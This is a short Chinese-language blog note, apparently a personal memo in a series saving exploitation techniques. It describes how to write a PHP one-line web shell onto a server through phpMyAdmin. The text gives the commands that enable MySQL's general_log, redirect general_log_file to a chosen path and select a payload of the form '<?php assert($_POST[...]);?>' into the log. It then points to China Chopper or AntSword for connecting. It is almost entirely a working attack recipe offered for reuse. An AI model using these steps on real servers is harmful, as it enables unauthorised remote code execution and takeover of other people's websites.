第一章 phpmyadmin日志一句话写入
前言
这个系列我就是单纯想保存在我遇到过的一些漏洞利用方式,防止以后再碰到的时候再去搜索了。
一、phpmyadmin 变量
通过弱口令等其他一系列方式,进入到phpmyadmin后,进入变量中寻找如下两个变量名称:
general log #默认保存状态是off
general log file #默认保存路径
然后通过命令或者手动编辑的方式给修改成 on 以及自己所需要保存的路径
set global general_log=‘on’;
set global general_log_file=’文件路径’
二、phpmyadmin SQL执行
进入到phpmyadmin sql命令执行的界面,直接输入一句话木马
select ‘<?php assert($_POST[“hacker”]);?>’;
然后用中国菜刀、蚁剑直接连接就好了
总结
还是比较简单的